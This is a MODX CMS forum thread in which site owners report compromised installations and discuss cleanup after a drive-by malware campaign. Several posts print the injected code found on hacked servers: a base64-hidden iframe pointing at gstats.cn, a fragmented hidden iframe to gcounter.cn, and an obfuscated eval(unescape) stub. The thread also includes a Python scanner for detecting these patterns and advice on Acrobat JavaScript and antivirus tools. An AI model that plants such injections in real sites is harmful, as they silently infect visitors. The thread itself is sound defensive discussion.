  • FYI: Had a similar problem here.

    On one installation document.parser.class.inc.php was 'patched'.

    Malware code in manager/includes/document.parser.class.inc.php (line 516f):

           // Sets a marker cookie so the injection below only fires on a visitor's first request
           setcookie("prpc", 1, time()+20*10*25*142, "/");
           // On the first request, appends a hidden iframe (base64 decodes to a display:none iframe pointing at gstats.cn) before </body>
           if (!isset($_COOKIE["prpc"])) $this->documentOutput = str_replace('</body>', base64_decode("PGlmcmFtZSBzcmM9aHR0cDovL2dzdGF0cy5jbiBzdHlsZT1kaXNwbGF5Om5vbmU+PC9pZnJhbWU+") . "\n</body>", $this->documentOutput);

    On another installation external.js was 'patched'.

    Malware code in assets/snippets/maxigallery/js/external.js (line 11ff):

           // Only injects once per browser: the cookie check skips visitors already marked
           if (document.cookie.search("mcdbh=8") == -1) {
               // The iframe tag is split into string fragments so a plain search for "<iframe" does not match it
               document.write("<"+"if"+"rame s"+"rc="+"http://gc"+"ounter.cn "+"style=d"+"is"+"play:none"+">"+"</ifra"+"me"+">");
               document.cookie = "mcdbh=8;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";
           }

    Seems that the 'patcher' has some knowledge of MODx.
      Just to echo Dan’s previous post, these attacks have nothing to do with MODX CMS nor is it likely that those responsible have any particular knowledge of MODX CMS . The code posted by Jako is typical of code added to any PHP file on hacked servers, even those that are not running a CMS. You will almost always find PHP code obfuscated by base64-encoding the contents, and you will find compromised Javascript code that uses an anonymous function with eval() urldecode replace characters in a string that generates an include to the infected .pdf file on the hacker’s remote site:

      (function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"6 . . .

      The article Dan linked to below is very good, but it does not mention the very first thing you should do (well, second, after changing your FTP username and password and removing all saved FTP usernames and passwords from your FTP applications) is to open up Adobe Acrobat Reader, go to Edit->Preferences->Javascript and uncheck "Enable Acrobat Javascript". You should certainly update Adobe Acrobat, but if you are already infected, it will likely interfere with the Adobe update process. You will likely need to download a fresh copy of Adobe Acrobat if you are not already using version 9.x; the automatic "Check for Updates" in version 8.x seems to search for updates to version 8 only. After installing the updated version of Adobe, you will need to go into Preferences again and disable JavaScript a second time.

      I will reiterate from before--if this JavaScript option is enabled and you visit an infected website, even with Javascript disabled in your browser, you will become infected, even if you only visit the homepage, click on nothing in the site, and leave. Disabling JavaScript in Adobe Acrobat will prevent infection / reinfection regardless of which version of Adobe Acrobat is installed on your system.

      Server-side, a full restore from a backup that predates the infection is your best bet. For even more security, you could certainly specify the IP addresses that are permitted to log in to your web server.

      Steven
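      As an added example that is not part of either post above, the following Python script shows one way a defender could sweep a document root for the three injection patterns quoted in this thread: a base64_decode() call whose decoded payload is a hidden iframe, a document.write() of an iframe tag split into concatenated string fragments, and the eval(unescape(...)) construct. The sample inputs are copied from the snippets Jako posted (the PHP and JavaScript fragments) plus one constructed line in the shape of the obfuscated JavaScript Steven quoted; the regexes and the finding labels are my own assumptions, not anything from MODX or from a real scanner.

```python
import base64
import re

# Constructed sample inputs: the first two are the fragments quoted in the thread,
# the third is a minimal line in the style of the eval(unescape(...)) snippet, the
# fourth is benign code that uses document.write legitimately.
PHP_SAMPLE = r'''
setcookie("prpc", 1, time()+20*10*25*142, "/");
if (!isset($_COOKIE["prpc"])) $this->documentOutput = str_replace('</body>', base64_decode("PGlmcmFtZSBzcmM9aHR0cDovL2dzdGF0cy5jbiBzdHlsZT1kaXNwbGF5Om5vbmU+PC9pZnJhbWU+") . "\n</body>", $this->documentOutput);
'''
JS_SAMPLE = r'''
if (document.cookie.search("mcdbh=8") == -1) {
document.write("<"+"if"+"rame s"+"rc="+"http://gc"+"ounter.cn "+"style=d"+"is"+"play:none"+">"+"</ifra"+"me"+">");
document.cookie = "mcdbh=8;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
'''
OBF_SAMPLE = "(function(jil){eval(unescape('%76%61%72'));})();"  # constructed
CLEAN_SAMPLE = 'function greet(name) { document.write("Hello, " + name); }'

B64_CALL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
# Two adjacent double-quoted literals joined by "+": "ab"+"cd" -> "abcd"
CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')
EVAL_UNESCAPE = re.compile(r'eval\s*\(\s*unescape\s*\(')
IFRAME_SRC = re.compile(r'<iframe\b[^>]*\bsrc=["\']?(https?://[^\s"\'>]+)', re.I)


def collapse_concats(text):
    """Fold chains of adjacent string literals so "if"+"rame" reads as "iframe"."""
    prev = None
    while prev != text:          # repeat until no pair of literals is left to merge
        prev = text
        text = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
    return text


def decode_base64_calls(text):
    """Replace base64_decode("...") with its decoded text so hidden markup becomes visible."""
    def _dec(m):
        try:
            return '"' + base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace") + '"'
        except ValueError:       # not valid base64: leave the call untouched
            return m.group(0)
    return B64_CALL.sub(_dec, text)


def scan(text):
    """Return (label, detail) findings for one file's contents; an empty list means nothing flagged."""
    findings = []
    normalized = decode_base64_calls(collapse_concats(text))
    for m in IFRAME_SRC.finditer(normalized):
        findings.append(("hidden-iframe-injection", m.group(1)))
    if EVAL_UNESCAPE.search(text):
        findings.append(("eval-unescape-obfuscation", "eval(unescape(...)) construct"))
    if "document.cookie" in text and "document.write" in text:
        findings.append(("cookie-gated-write", "document.write guarded by a cookie check"))
    return findings


if __name__ == "__main__":
    for name, sample in [("php", PHP_SAMPLE), ("js", JS_SAMPLE),
                         ("obfuscated", OBF_SAMPLE), ("clean", CLEAN_SAMPLE)]:
        print(name, scan(sample))
```

      The normalisation step is the point: matching on the raw bytes would miss both injections, because one hides the iframe inside base64 and the other splits the tag into pieces, so the scanner first undoes those two tricks and only then looks for an iframe with a remote src. The cookie-gated document.write check is a weaker heuristic and will flag some legitimate code, so treat it as a lead to read, not proof of compromise; the base64 and fragment-folding results are far more specific.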


      • Thanks for the detailed summary Steven. Much appreciated.
          Ryan Thrash, MODX Co-Founder
          Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
          After installing the updated version of Adobe, you will need to go into Preferences again and disable JavaScript a second time.

          Hi Steven,

          these hacks sound nasty - shudder to think...!
          what about the Flash player? I think this exploit affects the Flash player as well, right? I precautiously updated Acrobat and the Flash player. Here's Adobe's Security Bulletin: http://www.adobe.com/support/security/bulletins/apsb09-06.html

          and btw, what is Acrobat's JS functionality used for anyway?

          thanks, j
          • What do you use JS for on your website? grin

            You can do most of the same stuff, such as form validation, in a PDF document. You can also include photos, 3D files, audio, and video in PDF files, but that's beside the point.

            Oh, and Adobe should be doing regular patches going forward to address the issue if anyone missed the announcement.

            AMDbuilder
              Patrick | Server Wrangler
              About Me: Website | TweetsMODX Hosting
              Thanks again for everyone's input - I'd like to say again - I'm sorry if I in any way implied this is a MOD-X specific exploit... it is NOT! - the last thing I want to do is upset the support and use of the great framework that is ModX

              A bulletin update regarding this exploit was released by adobe on June 4 - the same day as my original post, scarily enough: http://www.adobe.com/support/security/bulletins/apsb09-06.html

              Steven, from your post, am I right in concluding from what you say that disabling Javascript in Adobe will also disable the exploit? Or, once the exploit is resident, there is a vulnerability until the local machine is cleaned (either by finding the virus or formatting the drive)?

              I say this as I have run Sophos, Antivirus, Norton, AVG, Avast, Spybot S&D, Spyware Doctor and Adaware without any success in hunting down the trojan in question.

              Separately, am I right in saying that the actual site hosted does not have the trojan/dropper/exploit resident itself, rather a script / code redirection (either through iframes or javascript injection - and image / SWF Flash injection in some circumstances) to the trojan and / or marketing scam sites, etc?



              Thanks again,

              Dan.

              • Try Trojan Remover and also if you didn’t already disable system restore. Viruses are known to hide in these areas. Also if you have two or more profiles you need to scan in them all.

                Best of luck,
                AMDbuilder
                  Patrick | Server Wrangler
                  About Me: Website | TweetsMODX Hosting
                  I say this as I have run Sophos, Antivirus, Norton, AVG, Avast, Spybot S&D, Spyware Doctor and Adaware without any success in hunting down the trojan in question.

                  I read somewhere people were successful with Malwarebytes' Anti-Malware

                    Malwarebytes' Anti-Malware is probably the best tool for detecting this exploit (along with many others)--free to install and scan on-demand, low-cost to add real-time scanning. There is also info on their site on installing Malwarebytes under another application name in case an exploit is blocking applications in your registry by name.

                    I believe Acrobat’s Javascript functionality is used for form completion and validation. It does make you shudder to think that you can simply visit a site with JavaScript disabled, click on nothing, and still become infected.

                    The same exploit could theoretically be propagated through Flash using a malicious .swf file; however, I haven't seen a malicious .swf used to deliver the gumblar.ca exploit yet, as programming the buffer overflow that allowed compromised access to your local system is apparently more difficult for a .swf than for a .pdf.

                    Adobe did release a patch, but it came quite late IMHO... Another issue is Adobe's updater, which checks for updates to your current version only (and I'm not sure whether or not they patched earlier versions). Thus, if you are using Adobe Acrobat 8 and click "Check for Updates" from within Adobe Acrobat's interface, it will inform you there are no updates--not prompt you to update to version 9.xx. Also, if you are already infected, updates to Adobe Acrobat will be blocked in your registry (along with other antivirus updates).

                    Even after installing the patched 9.xx version, Javascript is still enabled by default, and it should be disabled unless you have a specific need for it.

                    Steven
                      thanks for that detailed explanation - again smiley